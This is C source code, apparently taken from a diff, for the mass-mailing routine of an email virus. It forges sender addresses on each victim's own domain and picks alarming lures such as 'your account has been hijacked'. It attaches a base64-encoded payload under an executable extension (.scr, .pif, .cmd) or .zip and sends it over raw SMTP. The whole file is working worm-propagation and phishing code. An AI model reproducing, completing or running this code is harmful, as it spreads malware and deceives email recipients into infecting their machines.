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- /**************************************
- * Purpose:
- * Generates Email messages and sends
- * the recipient of the virus
- *
- * TODO: Add in a mail queue. Chose random
- * address from the queue and pop it off
- * and use it as from address
- *
- **************************************/
- // If there is an error return true so we don't **** up the massmailing
- BOOL chk(int iStatus)
- {
- if (iStatus!=SOCKET_ERROR && iStatus!=0)
- {
- return TRUE;
- }
- return FALSE;
- }
- char mail_1[64] = "", helokitty[64] = ""; //lol, meow! :=)
- char bigbuff[4096],szLine[255],MessageBuffer[255];
- //send the message buffer to the server we are connected to
- void sendmsgbuff()
- {
- if(!chk(send(hServer,MessageBuffer,strlen(MessageBuffer),0)))
- ErrorLevel = ERROR_LEVEL_SEND;
- }
- void recvbuff()
- {
- if(!chk(recv(hServer,bigbuff,sizeof(bigbuff),0)))
- if (bigbuff[0]=='4' || bigbuff[0]=='5') ErrorLevel = ERROR_LEVEL_RECEIVE;
- }
- //gets the date from the local system and then implements that as the date of when the email was sent
- void getdate(FILETIME *time, char *buf)
- {
- DWORD daylight_flag; int utc_offs, utc_offs_u;
- LPSTR weekdays[7] = { "Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat" };
- LPSTR months[12] = { "Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov", "Dec" };
- if (time == NULL) {
- GetLocalTime(&t);
- } else {
- FileTimeToLocalFileTime(time, &lft);
- FileTimeToSystemTime(&lft, &t);
- }
- tmz_info.Bias = 0;
- daylight_flag = GetTimeZoneInformation(&tmz_info);
- utc_offs = tmz_info.Bias;
- if (daylight_flag == TIME_ZONE_ID_DAYLIGHT) utc_offs += tmz_info.DaylightBias;
- utc_offs = -utc_offs;
- utc_offs_u = (utc_offs >= 0) ? utc_offs : -utc_offs;
- if (t.wDayOfWeek > 6) t.wDayOfWeek = 6;
- if (t.wMonth == 0) t.wMonth = 1;
- if (t.wMonth > 12) t.wMonth = 12;
- static const char szDns[] = "%s %u %s %u.2u. %s";
- wsprintf(buf,
- "%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u",
- weekdays[t.wDayOfWeek], t.wDay,
- months[t.wMonth-1], t.wYear,
- t.wHour, t.wMinute, t.wSecond,
- (utc_offs >= 0) ? "+" : "-",
- utc_offs_u / 60, utc_offs_u % 60
- );
- }
- BOOL sendmail(LPSTR strTo)
- {
- char syste[100];
- GetSystemDirectory(syste,sizeof(syste));
- srand(GetTickCount()); //Seeds random number generator
- #define CRLF "\r\n"
- char* szBuf2 = new char[76];
- /////////////////////////////////////////////////
- static const char *gen_names[] = {
- "server","administration", "managment", "service", "userhelp"
- };
- #define gen_names_cnt (sizeof(gen_names) / sizeof(gen_names[0]))
- #define dmain 80
- char domain[dmain], *p;
- for (p=strTo; *p && *p != '@'; p++);
- if (*p++ != '@') return 0;
- lstrcpyn(domain, p, dmain-1);
- char froms[255];
- int i;
- i = rand() % gen_names_cnt;
- lstrcpy(froms, gen_names[i]);
- lstrcat(froms, "@");
- lstrcat(froms, domain);
- ////////////////////////////////////////////////
- char subject[200];
- static const char *subjects[] = {
- "Urgent Update!", "Server Error", "User Info", "URGENT PLEASE READ!", "Detailed Information",
- "User Information", "Email Account Information"
- };
- #define subjects_names (sizeof(subjects) / sizeof(subjects[0]))
- int j;
- j = rand() % subjects_names;
- lstrcpy(subject, subjects[j]);
- ////////////////////////////////////////////////
- char attachment[200];
- static const char *attachments[] = {
- "Update","Details","Information", "Gift", "Word Document", "Account Information"
- };
- #define attachments_names (sizeof(attachments) / sizeof(attachments[0]))
- int k;
- k = rand() % attachments_names;
- lstrcpy(attachment, attachments[k]);
- ///////////////////////////////////////////////
- char message[200];
- static const char *messages[] = {
- "There is urgent information in the attachment regarding your Email account",
- "Your Email account information has been removed from the system due to inactivity. To renew your account information refer to the attachment",
- "We regret to inform you that your account has been hijacked and used for illegal purposes. The attachment has more information about what has happened.",
- "Our Email system has received reports of your account flooding email servers. There is more information on this matter in the attachment",
- "Due to recent internet attacks, your Email account security is being upgraded. The attachment contains more details",
- "Our server is experiencing some latency in our email service. The attachment contains details on how your account will be affected."
- };
- #define message_names (sizeof(messages) / sizeof(messages[0]))
- int l;
- l = rand() % message_names;
- lstrcpy(message, messages[l]);
- ////////////////////////////////////////////////
- char extension[200];
- static const char *extensions[] = {
- ".zip",".scr",".pif", ".cmd"
- };
- #define extensions_names (sizeof(extensions) / sizeof(extensions[0]))
- int m;
- m = rand() % extensions_names;
- lstrcpy(extension, extensions[m]);
- lstrcat(attachment,extension);
- //printf(attachment); debugging purposes
- ////////////////////////////////////////////////
- ///////////////////////////////////////////////
- if(strstr(attachment,".zip"))
- {
- strcat(syste,"\\base64zip.sys");
- //printf(syste); debug
- }
- else
- {
- strcat(syste,"\\base64exe.sys");
- //printf(syste); even more debuggin
- }
- //////////////////////////////////////////////
- /***************************************
- * Standard Email bullshit sent to the server
- * I had to read some tutorials on this
- * Main part of the massmailing :P
- ***************************************/
- //everytime you see sprintf(MessageBuffer,blah); it is just
- // printing whatever arguements to the buffer then sends them to
- // the recipient's server
- if (strlen(helokitty)>0) sprintf(MessageBuffer,"HELO <%s>%s",helokitty,CRLF);
- else sprintf(MessageBuffer,"HELO %s%s",domain,CRLF);
- sendmsgbuff(); recvbuff();
- if (strlen(mail_1)>0) sprintf(MessageBuffer,"MAIL FROM: <%s>%s",mail_1,CRLF);
- else sprintf(MessageBuffer,"MAIL FROM: <%s>%s",froms,CRLF);
- sendmsgbuff(); recvbuff();
- sprintf(MessageBuffer,"RCPT TO: <%s>%s",strTo,CRLF);
- sendmsgbuff(); recvbuff();
- sprintf(MessageBuffer,"DATA%s",CRLF);
- sendmsgbuff(); recvbuff();
- char bufffer[MAX_PATH];
- getdate(NULL,bufffer);
- sprintf(MessageBuffer,"To: %s%s",strTo,CRLF); sendmsgbuff();
- sprintf(MessageBuffer,"Subject: %s%s",subject,CRLF); sendmsgbuff();
- sprintf(MessageBuffer,"Date: %s%s",bufffer,CRLF); sendmsgbuff();
- sprintf(MessageBuffer,"From: %s%s",froms,CRLF); sendmsgbuff();
- sprintf(MessageBuffer,"MIME-Version: 1.0%s",CRLF); sendmsgbuff();
- sprintf(MessageBuffer,"Content-Type: multipart/mixed;" ,CRLF); sendmsgbuff();
- sprintf(MessageBuffer,"boundary=\"--zzzxxxzzzxxx\"%s",CRLF); sendmsgbuff();
- sprintf(MessageBuffer,"X-Priotity: 3%s",CRLF); sendmsgbuff();
- sprintf(MessageBuffer,"X-MSMail-Priority: Normal%s",CRLF); sendmsgbuff();
- sprintf(MessageBuffer,"%sThis is a multipart MIME-encoded message%s%s",CRLF,CRLF,CRLF); sendmsgbuff();
- sprintf(MessageBuffer,"----zzzxxxzzzxxx%s",CRLF); sendmsgbuff();
- sprintf(MessageBuffer,"Content-Type: text/html; charset=\"us-ascii\"%s",CRLF); sendmsgbuff();
- sprintf(MessageBuffer,"Content-Transfer-Encoding: quoted-printable%s%s",CRLF,CRLF); sendmsgbuff();
- sprintf(MessageBuffer,"%s",CRLF); sendmsgbuff();
- sprintf(MessageBuffer,"%s%s",message,CRLF); sendmsgbuff();
- sprintf(MessageBuffer,"----zzzxxxzzzxxx%s",CRLF); sendmsgbuff();
- sprintf(MessageBuffer,"Content-Type: application/octet-stream; name=\"%s\"%s",attachment,CRLF); sendmsgbuff();
- sprintf(MessageBuffer,"Content-Transfer-Encoding: base64%s",CRLF); sendmsgbuff();
- sprintf(MessageBuffer,"Content-Disposition: attachment; filename=\"%s\"%s",attachment,CRLF); sendmsgbuff();
- sprintf(MessageBuffer,"%s",CRLF); sendmsgbuff();
- FILE* file1;
- char szBuf[MAX_PATH];
- char* strFile1 = new char[MAX_PATH];
- file1 = fopen(syste,"rb");
- if(file1==NULL)return 0;
- while(!feof(file1))
- {
- fscanf(file1,"%s\n",szBuf);
- sprintf(MessageBuffer,"%s%s",szBuf,CRLF);
- sendmsgbuff();
- }
- sprintf(MessageBuffer,"%s",CRLF); sendmsgbuff();
- sprintf(MessageBuffer,"----zzzxxxzzzxxx--%s",CRLF); sendmsgbuff();
- sprintf(MessageBuffer,"%s.%s",CRLF,CRLF);
- sendmsgbuff(); recvbuff();
- sprintf(MessageBuffer,"QUIT%s",CRLF);
- sendmsgbuff(); recvbuff();
- closesocket(hServer);
- return TRUE;
- }
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